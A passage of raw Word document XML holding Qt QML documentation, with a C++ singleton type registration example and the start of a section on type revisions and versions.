          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> someProperty() </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_someProperty; }</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FFFF55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> setSomeProperty(</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> val) { m_someProperty = val; emit somePropertyChanged(val); }</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signals:</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FFFF55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> somePropertyChanged(</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> newValue);</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55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</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FFFF55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_someProperty;</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55FFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// Second, define the singleton type provider function (callback).</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55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId230" w:history="1">
        <w:r w:rsidRPr="001C7F21">
          <w:rPr>
            <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> *example_qobject_singletontype_provider(</w:t>
      </w:r>
      <w:hyperlink r:id="rId231" w:history="1">
        <w:r w:rsidRPr="001C7F21">
          <w:rPr>
            <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:t>QQmlEngine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> *engine, </w:t>
      </w:r>
      <w:hyperlink r:id="rId232" w:history="1">
        <w:r w:rsidRPr="001C7F21">
          <w:rPr>
            <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:t>QJSEngine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> *scriptEngine)</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Q_UNUSED(engine)</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Q_UNUSED(scriptEngine)</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4F9D08"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>SingletonTypeExample</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> *example = </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>new</w:t>
      </w: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4F9D08"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>SingletonTypeExample</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>();</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FFFF55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> example;</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1C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// Third, register the singleton type provider with QML by calling this function in an initialization function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C7F21" w:rsidRPr="001C7F21" w:rsidRDefault="001C7F21" w:rsidP="001C7F21">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19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>qmlRegisterSingletonType&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>SingletonTypeExample</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"Qt.example.qobjectSingleton"</w:t>
      </w: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FF55FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w: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FF55FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"MyApi"</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, example_qobject_singletontype_provider);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C7F21" w:rsidRPr="001C7F21" w:rsidRDefault="001C7F21" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="001C7F21" w:rsidRDefault="00DA77C2" w:rsidP="008B0A55">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="274" w:name="type-revisions-and-versions"/>
      <w:bookmarkStart w:id="275" w:name="_Toc483000590"/>
      <w:bookmarkStart w:id="276" w:name="_Toc483003610"/>
      <w:bookmarkStart w:id="277" w:name="_Toc483603943"/>
      <w:bookmarkStart w:id="278" w:name="_Toc483605163"/>
      <w:bookmarkEnd w:id="274"/>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Type Revisions and Versions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="275"/>
      <w:bookmarkEnd w:id="276"/>
      <w:bookmarkEnd w:id="277"/>
      <w:bookmarkEnd w:id="278"/>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553BD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Many of the type registration functions require versions</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be specified for the registered type. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD015D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Type revisions and versions allow new properties or methods to exist in the new version while remaining compatible with previous versions.</w:t>
      </w:r>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DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Consider these two QML files:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// main.qml</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import</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QtQuick</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Item</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id</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root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MyType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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// MyType.qml</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import</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MyTypes</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CppType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value</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root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x</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where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CppType</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>maps to the C++ class</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CppType</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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lastRenderedPageBreak/>
        <w:t>If the author of CppType adds a</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root</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to CppType in a new version of their type definition,</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root.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>now resolves to a different value because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root</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is also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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of the top level component. The author could specify that the new</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root</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property is available from a specific minor version. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD015D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This permits new properties and features to be added to existing types without breaking existing programs.</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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD015D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REVISION tag</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to mark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root</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property as added in revision 1 of the type. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD015D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
